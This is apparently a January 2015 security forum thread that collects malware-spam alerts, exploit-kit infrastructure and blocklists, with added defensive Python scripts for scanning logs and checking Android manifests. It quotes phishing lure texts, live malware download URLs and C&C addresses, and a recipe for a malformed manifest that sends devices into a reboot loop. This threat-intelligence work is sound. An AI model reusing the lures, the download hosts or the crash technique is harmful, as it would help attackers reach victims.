ACH Transaction Report
DOC-file for report is ready
Invoice as requested
Invoice – P97291
Order – Y24383
Payment Details
Remittance Advice from Engineering Solutions Ltd
Your Automated Clearing House Transaction Has Been Put On ...
...the attachment containing Adnel and Tarbir campaigns is usually named as follows:
20140918_122519.doc
813536MY.xls
ACH Transfer 0084.doc
Automated Clearing House transfer 4995.doc
BAC474047MZ.xls
BILLING DETAILS 4905.doc
CAR014 151239.doc
ID_2542Z.xls
Fuel bill.doc
ORDER DETAILS 9650.doc
Payment Advice 593016.doc
SHIPPING DETAILS 1181.doc
SHIP INVOICE 1677.doc
SHIPPING NO.doc
Microsoft Technet blog* says that the two Trojan downloaders, TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns..."
* http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
2 Jan 2015

:fear: :mad: :fear:
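
The recommended blocklists quoted in the posts above (the 217.71.50.0/24 range, the binary options IPs and domains, the hqq .tv / Choopa and Digital Ocean IPs, and the SGBD macro downloader IPs) only earn their keep once they are run against real traffic. The Python script below is an added example and is not code from any of the quoted blogs or from this thread: it refangs the entries exactly as the posts write them (including the "domain .com" spacing), then reviews proxy log lines for hosts inside the listed ranges or domains and for the /mans/pops.php-on-port-8080 fetch pattern that the Excel and Word macros use. The log format, timestamps and client IPs are constructed for the example; the destinations are the ones the posts list.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Blocklist entries copied as the quoted posts give them: plain IPs, one
# CIDR range, and domains defanged with a space before the TLD.
BLOCKLIST_TEXT = """
217.71.50.0/24
46.108.40.76
201.215.67.43
31.210.63.94
clickmoneys .com
thinkedmoney .com
binarysmoney .com
moneyproff .com
108.61.165.69
178.62.147.144
128.199.52.108
128.199.48.44
194.146.136.1
179.43.141.164
213.174.162.126
194.28.139.100
206.72.192.15
213.9.95.58
"""

# Download path and port used by the SGBD / PAYMENT ADVICE macros.
DOWNLOADER_PATH_RE = re.compile(r"/mans/pops\.php$")
DOWNLOADER_PORT = 8080

# Constructed proxy log lines: "<timestamp> <client IP> <requested URL>".
# Clients and timestamps are invented; the last but one line uses a
# documentation-range host to show the path rule firing on its own.
SAMPLE_LOG = [
    "2015-01-06T09:01:12 10.0.0.12 http://213.174.162.126:8080/mans/pops.php",
    "2015-01-06T09:01:40 10.0.0.12 http://194.146.136.1:8080/",
    "2015-01-06T09:02:05 10.0.0.33 http://www.binarysmoney.com/",
    "2015-01-06T09:02:30 10.0.0.45 http://217.71.50.77/index.html",
    "2015-01-06T09:03:00 10.0.0.45 http://198.51.100.7:8080/mans/pops.php",
    "2015-01-06T09:03:15 10.0.0.50 https://www.example.org/",
]


def refang(entry):
    """Turn 'example .com' style entries back into 'example.com'."""
    return re.sub(r"\s+\.", ".", entry.strip().lower())


def load_blocklist(text):
    """Split the list into IP networks (single IPs become /32) and domains."""
    nets, domains = [], set()
    for raw in text.splitlines():
        entry = refang(raw)
        if not entry:
            continue
        try:
            nets.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            domains.add(entry)
    return nets, domains


def host_is_listed(host, nets, domains):
    """IP hosts match by CIDR containment; names match on any parent domain."""
    host = host.lower().rstrip(".")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        labels = host.split(".")
        # Check host, then each parent up to (but not including) the bare TLD.
        return any(".".join(labels[i:]) in domains for i in range(len(labels) - 1))
    return any(addr in net for net in nets)


def review_log(lines, nets, domains):
    """Return (client, reason, url) for every line that hits a rule."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        client, url = parts[1], parts[2]
        parsed = urlsplit(url)
        host = parsed.hostname or ""
        try:
            port = parsed.port
        except ValueError:
            port = None
        if host_is_listed(host, nets, domains):
            hits.append((client, "blocklisted host", url))
        elif port == DOWNLOADER_PORT and DOWNLOADER_PATH_RE.search(parsed.path):
            hits.append((client, "macro downloader URL pattern", url))
    return hits


def suspect_clients(hits):
    """Internal machines that talked to listed infrastructure, for triage."""
    return sorted({client for client, _, _ in hits})


if __name__ == "__main__":
    nets, domains = load_blocklist(BLOCKLIST_TEXT)
    for client, reason, url in review_log(SAMPLE_LOG, nets, domains):
        print(f"{client}\t{reason}\t{url}")
    print("review these clients:", ", ".join(suspect_clients(review_log(SAMPLE_LOG, nets, domains))))
```

The host rule catches traffic to anything the posts list, including subdomains of the listed domains and any address inside a listed /24; the path rule catches the downloader fetch even from a host that is not (yet) on the list, which is the case to watch for since the macro runs rotate IPs between waves.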

AplusWebMaster
2015-01-07, 11:50
FYI...

Exploit kits on Choopa LLC / Gameservers .com IP addresses
- http://blog.dynamoo.com/2015/01/exploit-kits-on-choopa-llc.html
7 Jan 2015 - "... The characteristics of these malicious landing pages are that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE:
ooshuchahxe .co.vu
ahjoneeshae .co.vu
phamiephim .co.vu
kaemahchuum .co.vu
pahsiefoono .co.vu
kaghaingai .co.vu
buengaiyei .co.vu
ohmiajusoo .co.vu
oodeerahshe .co.vu
paotuchepha .co.vu
aedeequeekou .co.vu
eikoosiexa .co.vu
phielaingi .co.vu
thohbeekee .co.vu
A typical exploit landing page looks like this* which appears to be the Nuclear EK. These are hosted on the following Choopa LLC / Gameservers .com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:
108.61.165.69: https://www.virustotal.com/en/ip-address/108.61.165.69/information/
108.61.165.70: https://www.virustotal.com/en/ip-address/108.61.165.70/information/
108.61.165.96: https://www.virustotal.com/en/ip-address/108.61.165.96/information/
108.61.167.160: https://www.virustotal.com/en/ip-address/108.61.167.160/information/
108.61.172.139: https://www.virustotal.com/en/ip-address/108.61.172.139/information/
108.61.175.125: https://www.virustotal.com/en/ip-address/108.61.175.125/information/
108.61.177.107: https://www.virustotal.com/en/ip-address/108.61.177.107/information/
108.61.177.89: https://www.virustotal.com/en/ip-address/108.61.177.89/information/
... these domains seem to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google... Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121
64.187.225.245
104.224.147.220
UPDATE: Choopa LLC say they have terminated those IPs**. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised."
* http://urlquery.net/report.php?id=1420560803160

** https://2.bp.blogspot.com/-6jzwvTDMi9U/VK1T26Lei_I/AAAAAAAAGFs/H6-oPE7HwA8/s1600/choopa.png
___

Huffington Post and Gamezone visitors targeted with malvertising, infected with ransomware
- http://net-security.org/malware_news.php?id=2936
Jan 7, 2015 - "The last days of the past and the first days of the current year have been unlucky for visitors of several popular sites including the Huffington Post and Gamezone .com, which were unknowingly serving malicious ads that ultimately led to a ransomware infection. Cyphort Lab researchers first spotted the malvertising campaign on New Year's Eve on the HuffPo's Canadian website. A few days later, the ads were served on HuffingtonPost .com. The ensuing investigation revealed that the source of the ads is advertising .com, an AOL ad-network. Visitors to the sites who were served the ads were automatically redirected to a landing page hosting either the Neutrino or the Sweet Orange exploit kit. The kits served several exploits, and if one of them was successful, a new variant of the Kovter ransomware was downloaded and executed. Kovter* blocks the targeted computer's keyboard and mouse, usually demands a ransom of around $300, and searches the web browser's history for URLs of adult content sites to include in the ransom note. AOL has been notified of the problem, and has removed the malicious ads from rotation both in their advertising.com ad-network as well as in their adtech .de one... This is not the first time that Kovter was delivered in this way. Another malvertising campaign targeting YouTube users** was spotted in October 2014."
* http://www.net-security.org/malware_news.php?id=2450

** http://www.net-security.org/malware_news.php?id=2883
Sweet Orange exploit kit/NeutrinoEK: http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/

>> http://www.cyphort.com/huffingtonpost-serving-malware/
___

Fake 'Accounts Payable - Remittance Advice' SPAM - doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-specialist-remittance-advice-word-doc-malware/
7 Jan 2015 - "'Remittance Advice for 945.66 GBP' (random amounts) pretending to come from a random named Senior Accounts Payable Specialist at a random company with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Update: we are also seeing a slightly different version with the subject Invoice 2907.51 GBP (random amounts) with an Excel XLS attachment... The email looks like:

Please find attached a remittance advice for recent BACS payment of 945.66 GBP.
Any queries please contact us.
Katie Carr
Senior Accounts Payable Specialist
BUSHVELD MINERALS LTD

7 January 2015 : REM_5160JW.doc - Current Virus total detections: 4/56*
... [1]connects to 193.136.19.160 :8080//mans/pops.php and downloads the usual dridex to %temp%\1V2MUY2XWYSFXQ.exe Current VirusTotal definitions 4/56**
RBAC_2856PJ.xls Current Virus total detections: 3/56***
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9bb9d75b19588ae6d5099e6f9f69485410a39da3e3c69d02db2756ad527d4e0b/analysis/1420634098/

** https://www.virustotal.com/en/file/f96c2e9c17fe8a9a93251c93ed477d0715f8a06b465420c2ffa2e713ca7b8256/analysis/1420635840/
... Behavioural information:
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/

*** https://www.virustotal.com/en/file/f50ca59a7e263a9b8f6b3432d380aebca85dfe041872812c81aafa26bf3b3973/analysis/1420636228/

1] 193.136.19.160: https://www.virustotal.com/en/ip-address/193.136.19.160/information/
___

Fake 'NUCSOFT-Payroll' SPAM - doc malware
- http://myonlinesecurity.co.uk/eliza-fernandes-nucsoft-payroll-december-2014-word-doc-malware/
7 Jan 2015 - "'NUCSOFT-Payroll December 2014' pretending to come from Eliza Fernandes <eliza_fernandes@ nucsoft .co.in> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/NUCSOFT-Payroll-December-2014.jpg

7 January 2015 : Payroll Dec’14.doc - Current Virus total detections: 2/56*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420619222/

- http://blog.dynamoo.com/2015/01/malware-spam-eliza-fernandes-nucsoft.html
7 Jan 2015
> https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420623113/

>> https://www.virustotal.com/en/file/4d3bb0cfba9f6090e2704fe003e373002f906df0d59c68e73ff0d8a20cd36884/analysis/1420624521/

Recommended blocklist:
59.148.196.153: https://www.virustotal.com/en/ip-address/59.148.196.153/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices
- http://blog.trendmicro.com/trendlabs-security-intelligence/malformed-androidmanifest-xml-in-apps-can-crash-mobile-devices/
Jan 7, 2015 - "Every Android app comprises several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a -continuous- cycle of rebooting — rendering the device nearly useless to the user. The Manifest File Vulnerability: The vulnerability can cause the OS to crash in two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stop and the whole system consequently reboots once. The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter:
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
If there are many activities defined with this intent-filter, the same number of icons will be created in the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000:
For Android OS version 4.4, the launcher process will undergo the reboot.
For version L, the PackageParser crashes and reboots. The malformed .APK will be installed but no icon will be displayed. If the number of activities is larger than 100,000, the devices will undergo the -loop- of rebooting...
We have tested and proven that this created APK could -crash- both Android OS 4.4.4, Android OS L, -and- older versions of the platform... While this vulnerability isn’t technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but -only- if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue."
___

Fake Flight QZ8501 Video on Facebook
- https://blog.malwarebytes.org/fraud-scam/2015/01/dont-share-this-fake-flight-qz8501-video-on-facebook/
Jan 6, 2015 - "... If you’re waiting on information with regards what caused the tragic crash of AirAsia Flight QZ8501, please be aware that the inevitable fake Facebook video links are now putting in an appearance. Here’s one, located at: bergkids(dot)com/qz8501 - The page is pretty bare, save for the imagery of what they claim is the plane in question and the following text:
[CRASH VIDEO] AirAsia Flight QZ8501 Crashed near east coast of Sumatera.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz1.jpg
Clicking the play button encourages Facebook users to share it, before being redirected to an -imitation- YouTube page located at: urvashi(dot)altervista(dot)org/video/vid(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz2.jpg
While visitors might think this would be the video in question, in actual fact they’re looking at a sort of -fake- video -farm- where clicking the link takes them to a wide variety of phony clip scams... From there, they’re then (re)directed to one of the links in the screenshot above. There’s everything from “You won’t eat [product x] again after seeing this” to non-existent leaked celebrity tapes. Disturbingly, two of the pages claim to show car accidents and one of them uses a rather graphic photograph. Given that people could be arriving there from a personal need to find out more information about the plane crash, this is just more proof that the people behind these pages couldn’t care less... All of the above pages return the visitor to the “main” Altervista URL, where they’ll be asked to share then be sent to another of the links in the -redirect- code. It seems to be a way of trying to drop the links on as many feeds as possible (assuming the Facebook account owner changes the share option from “just me” to people in their social circles). Should the weary clicker grow tired of this digital roundabout and simply sit on the altervista page too long, they’ll find that they’re automatically sent to a page called “Horrific Video”:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz5.jpg
Unlike the other pages which simply loop potential victims around while asking them to share links, this one will take them to a -survey- page if the video “player” is clicked... As with all other survey pages, the links could lead to everything from offers and personal questions to ringtone signups or software installs and are usually served up according to region... If you want to know the latest information on the AirAsia crash, please stick to news sources you know and trust. It’s extremely unlikely someone is going to have exclusive footage sitting on some video website you’ve never heard of, and the moment you’re caught in a loop of “Share this on Facebook to view” messages you can bet there’s nothing on offer except someone trying to make a fast buck."

:fear::fear: :mad:
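
The Android manifest conditions described above, as an added defensive check that is not code from the Trend Micro post: it refuses a manifest that declares a DTD or entity (the "huge string" case) and counts MAIN/LAUNCHER activities against the 10,000 and 100,000 thresholds the post quotes. The check itself and the constructed test manifests are assumptions, not anything the post ships.

```python
"""
Added example (not from the Trend Micro post): a pre-install sanity check for
AndroidManifest.xml covering the two conditions described above,
(1) DTD/entity declarations whose expansion eats memory in the parser and
(2) an excessive number of launcher activities.
The 10,000 and 100,000 thresholds are the ones quoted in the post; the check
and the synthetic manifests are assumptions.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS        # ElementTree's form of android:name
LAUNCHER_WARN = 10_000                      # launcher / PackageParser reboot (post)
LAUNCHER_CRIT = 100_000                     # reboot loop (post)

MAIN_ACTION = "android.intent.action.MAIN"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"

# A normal manifest never needs a DTD, and expanding one is where the memory
# goes, so the presence of a declaration is itself the signal: do not parse.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def count_launcher_activities(manifest_xml: bytes) -> int:
    """Count <activity> elements with a MAIN + LAUNCHER intent-filter,
    i.e. the activities that each get a home-screen icon."""
    root = ET.fromstring(manifest_xml)
    count = 0
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            actions = {a.get(NAME_ATTR) for a in flt.findall("action")}
            categories = {c.get(NAME_ATTR) for c in flt.findall("category")}
            if MAIN_ACTION in actions and LAUNCHER_CATEGORY in categories:
                count += 1
                break            # one icon per activity, however many filters
    return count


def check_manifest(manifest_xml: bytes) -> dict:
    """Return {'dtd', 'launcher_activities', 'verdict'}; verdict is
    'ok', 'warn' or 'reject'."""
    result = {"dtd": False, "launcher_activities": 0, "verdict": "ok"}
    if DTD_RE.search(manifest_xml):
        result["dtd"] = True
        result["verdict"] = "reject"   # never expand the entities to find out
        return result
    n = count_launcher_activities(manifest_xml)
    result["launcher_activities"] = n
    if n >= LAUNCHER_CRIT:
        result["verdict"] = "reject"
    elif n >= LAUNCHER_WARN:
        result["verdict"] = "warn"
    return result


def build_manifest(n_launchers: int, with_dtd: bool = False) -> bytes:
    """Constructed test manifest: n launcher activities plus one ordinary
    (non-launcher) activity, optionally with an entity declaration."""
    def activity(i: int, launcher: bool) -> str:
        flt = ""
        if launcher:
            flt = (f'   <intent-filter>\n    <action android:name="{MAIN_ACTION}"/>\n'
                   f'    <category android:name="{LAUNCHER_CATEGORY}"/>\n   </intent-filter>\n')
        return f'  <activity android:name=".A{i}">\n{flt}  </activity>\n'

    body = "".join(activity(i, True) for i in range(n_launchers))
    body += activity(n_launchers, False)
    dtd = '<!DOCTYPE manifest [<!ENTITY big "' + "A" * 64 + '">]>\n' if with_dtd else ""
    label = "&big;" if with_dtd else "demo"
    xml = (f'<?xml version="1.0" encoding="utf-8"?>\n{dtd}'
           f'<manifest xmlns:android="{ANDROID_NS}" package="com.example.demo">\n'
           f' <application android:label="{label}">\n{body} </application>\n</manifest>\n')
    return xml.encode("utf-8")


if __name__ == "__main__":
    for n, dtd in ((3, False), (LAUNCHER_WARN, False), (2, True)):
        print(n, dtd, check_manifest(build_manifest(n, dtd)))
```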

AplusWebMaster
2015-01-08, 14:53
FYI...

Fake 'invoice EME018' SPAM – doc malware
- http://myonlinesecurity.co.uk/ieuan-james-invoice-eme018-docx-word-doc-malware/
8 Jan 2015 - "'invoice EME018.docx' pretending to come from Ieuan James <emerysieuan@ gmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has come in corrupted on my email server and looks like this (I am sure some email servers will serve up a working version) :
--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: application/msword;
name="invoice EME018.doc";
x-apple-part-url=D103C3C9-1CC9-4BE2-89E7-EB608B41F92A
Content-Disposition: attachment;
filename="invoice EME018.doc"
Content-Transfer-Encoding: base64 ...

... extracted the malicious word doc from the content.
8 January 2015 : invoice EME018.doc - Current Virus total detections: 1/56*
According to Dynamoo’s blog[1] this EME018.doc malware file will connect to one of these sites http ://ecovoyage.hi2 .ro/js/bin.exe http ://mateusz321.cba .pl/js/bin.exe - This binary is saved as %TEMP%\oHIGUIgifdg.exe and has a VirusTotal detection rate of 10/55** ..."
* https://www.virustotal.com/en/file/66a2de2890ebaf7ca4521f97a44c5f30371aea72dc1023b051fea4ef3da94ece/analysis/1420701971/

** https://www.virustotal.com/en/file/12f6d880b94e16fbc1fca0ba1c97b47373e81e03cffc8d08954db13dea1c0678/analysis/1420708713/

1] http://blog.dynamoo.com/2015/01/malware-spam-ieuan-james-invoice.html
8 Jan 2015 - "... this morning I've seen a handful of these malformed malware spams, claiming to be from a Ieuan James and with a subject of invoice EME018.docx. The body text contains some Base64 encoded data which presumably is meant to be an attachment... Recommended minimum blocklist:
59.148.196.153
74.208.11.204
129.215.249.52
78.140.164.160
37.1.208.21
86.156.238.178
In addition I suggest blocking 3NT Solutions LLP / inferno.name IP ranges on sight. I would very strongly recommend blocking the entire 37.1.208.0/21 range..."
___

Fake 'INVOICE ADVISE' and 'NOVEMBER INVOICE' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/01/malware-spam-invoice-advise-08012015.html
8 Jan 2015 - "These two -spam- runs have different email messages but the same payload. In both cases, there are multiple -fake- senders:
Sample 1 - INVOICE ADVISE 08/01/2015
From: Mia Holmes
Date: 8 January 2015 at 09:11
Subject: INVOICE ADVISE 08/01/2015
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Mia Holmes
Accountant
SULA IRON & GOLD PLC

Sample 2 - NOVEMBER INVOICE
From: Reed Barrera
Date: 8 January 2015 at 09:16
Subject: NOVEMBER INVOICE
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Reed Barrera
Controller
ASSETCO PLC

Other sender names include:
- Marlin Rodriquez
Accountant
CLONTARF ENERGY PLC
- Olive Pearson
Senior Accountant
ABERDEEN UK TRACKER TRUST PLC
- Andrew Salas
Credit Management
AMTEK AUTO
The attachment is in a Word document (in one sample it was a Word document saved as an XLS file). Example filenames include:
RBAC_9971IV.xls
INV_6495NU.doc
2895SC.doc
There are -four- different malicious files that I have seen so far, all with low detection rates [1] [2] [3] [4] which contain in turn one of these macros... leading to a download from one of the following locations:
http ://188.241.116.63 :8080/mops/pops.php
http ://108.59.252.116 :8080/mops/pops.php
http ://178.77.79.224 :8080/mops/pops.php
http ://192.227.167.32 :8080/mops/pops.php
This file is downloaded as g08.exe which is then copied to %TEMP%\1V2MUY2XWYSFXQ.exe. This file has a detection rate of 3/56*. The VT report shows a POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known malware server which I recommend that you block. This IP is confirmed in the Malwr report which also shows a dropped DLL which is the same as found in this spam run and has a detection rate of just 2/56**."
1] https://www.virustotal.com/en/file/e0225133c9a4987fcb29c8e646225496248c16a033a565b70b77f4288071b426/analysis/1420712512/

2] https://www.virustotal.com/en/file/b018c37bd4b27d8fcfc543d05ef5c0f0477551afe4a396584c6f1b83aeacfa92/analysis/1420712527/

3] https://www.virustotal.com/en/file/b1c10f76fc15c3ca6ca89df5335d716241e57951098f7324bbe8c627430a0af6/analysis/1420712717/

4] https://www.virustotal.com/en/file/d75b7a1865bed23978462197e7b5d8f1f25dd7eec8244d29f4710dc22bf6e36e/analysis/1420713398/

* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/

** https://www.virustotal.com/en/file/b56547ec2ee8185f772f1cdf034573883df442e4e9fde458fcf526a97563d53b/analysis/1420714510/

- http://myonlinesecurity.co.uk/november-invoice-word-doc-excel-xls-malware/
8 Jan 2015: INV_7330KQ.doc - Current Virus total detections: 1/56*
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/

:fear: :mad:

AplusWebMaster
2015-01-09, 15:16
FYI...

Fake 'Monthly Invoice & Report' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-do-not-reply-datasharp-uk.html
9 Jan 2015 - "This spam email pretends to be from a wholly legitimate company called Datasharp UK Ltd but it isn't; it is a spoof. Datasharp is not sending the spam, their systems have not been compromised in any way.
From: ebilling@ datasharp .co
Date: 9 January 2015 at 06:55
Subject: DO-NOT-REPLY Datasharp UK Ltd - Monthly Invoice & Report
THIS MESSAGE WAS SENT AUTOMATICALLY
Attached is your Invoice from Datasharp Hosted Services for this month.
To view your bill please go to www .datasharp .co.uk. Allow 24 hours before viewing this information.
For any queries relating to this bill, please contact hosted.services@ datasharp .co.uk or call 01872 266644.
Please put your account number on your reply to prevent delays
Kind Regards
Ebilling

So far I have seen two different Word documents attached with low detection rates at VirusTotal [1] [2] containing one of two malicious macros... which then attempt to download an additional component from the following locations:
http ://TICKLESTOOTSIES .COM/js/bin.exe
http ://nubsjackbox.oboroduki .com/js/bin.exe
The tickletootsies .com download location has been cleaned up, but the other one is still working as it downloads a file with a VirusTotal detection rate of 5/56*. That VirusTotal report also shows that it attempts to POST to 74.208.11.204:8080 (1&1, US) which has been a malware C&C server for several weeks and is definitely worth blocking.
UPDATE: the Malwr report shows connections to the following IPs which I recommend you block:
59.148.196.153
74.208.11.204 "
1] https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420794297/

2] https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420794299/

* https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/

- http://myonlinesecurity.co.uk/not-reply-datasharp-uk-ltd-monthly-invoice-report-word-doc-malware/
9 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/DO-NOT-REPLY-Datasharp-UK-Ltd-Monthly-Invoice-Report.jpg

* https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420787444/

** https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420787603/

*** https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
___

Fake 'Fax' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-employee-documents.html
9 Jan 2015 - "This -fake- fax run is a variation of this one* from yesterday.
From: Fax [no-replay@ fax-voice .com]
Date: 9 January 2015 at 14:52
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: <redacted> ...

As before, there are several links leading to different download locations... These landing pages lead to a pair of jjencoded javascripts hosted on different files. I explained a little about those last time* ... the download location that you coax out of the script is time-limited. If you wait too long, you get a nonsense script instead. And possibly even more interesting is that every time you download the target ZIP file "message.zip ;.zip ;.zip ;" it seems to be different... That led to -10- different ZIP files containing different EXE files... Although those reports indicate some difference in the port numbers, we can see the following URLs being accessed:
http ://202.153.35.133 :55365/0901us1/HOME/0/51-SP3/0/
http ://202.153.35.133 :55365/0901us1/HOME/1/0/0/
http ://crecrec .com/mandoc/nuts12.pdf
http ://202.153.35.133 :55350/0901us1/HOME/41/7/4/
http ://samrhamburg .com/img/ml1.tar
202.153.35.133 (Excell Media Pvt Lt, India) is probably the key thing to block. Despite the differences in the downloader, they all seem to drop a randomly-named file with identical characteristics in each case. This has a VirusTotal detection rate of 1/55** and you can see the Malwr report for that file here***..."
* http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html

** https://www.virustotal.com/en/file/86f0fea9f2cbe4d542f9519120a8df4c20c4ad85539601859c009639d060ce9b/analysis/1420818425/

*** https://malwr.com/analysis/ZjMwNTJiMjEwNDcyNDkxOGEzZTZmZjVjYWE0ZmQwZDU/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Bingham McCutchen Law Firm Spam
- http://threattrack.tumblr.com/post/107594031823/bingham-mccutchen-law-firm-spam
Jan 9, 2015 - "Subjects Seen:
Judicial summons
Typical e-mail details:
Warrant to appear Please be informed that you are expected in the Hamilton County Court of Appeals on February 2nd, 2015 at 9:30 a.m. where the hearing of your case of illegal software use will take place. You may obtain protection of a lawyer, if necessary.
Please bring your identity documents to the Court on the named day. Attendance is compulsory.
The detailed plaint note is attached to this letter, please download and read it thoroughly.
Clerk of court,
Jacob Velez

Malicious URLs:
joalpe.firebearstudio .com/dir.php?bh=oBRzRrtM0A02ooUI1aER2YGsHzIP29bCneRZntfom+A=
Malicious File Name and MD5:
PlaintNote_BinghamMcCutchen_00588315.exe (E1A7061CCB8997EAB296AA84454B072B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7039d07d7335501cb375a1b4d3632bf5/tumblr_inline_nhwvymzDyH1r6pupn.png

Tagged: law firm, Kuluoz
___

Fake CNN Twitter Feeds SPAM weight loss links
- https://blog.malwarebytes.org/fraud-scam/2015/01/fake-cnn-twitter-feeds-spam-weight-loss-links/
Jan 9, 2014 - "We’ve noticed a number of fake CNN-themed Twitter accounts driving traffic to a couple of different weight loss sites. The accounts in question are:
CNNOnly
TheCNNBreak
MyCNNNews
CNNHotline
All of the above started posting their links in the last few hours... Curiously, they all stopped posting their random mish-mash of memes and joke images around December 18 or 19, so it’s possible they could be formally parked bots which have taken on a new lease of life in some way. We’ve also seen non-CNN-themed accounts sending out the same links. To give you an idea of click totals, the stats for two of the links we’ve seen are as follows:
bit(dot)ly/12NTPUP – 25,814 clicks
bit(dot)ly/1zxVKtB – 37,262 clicks
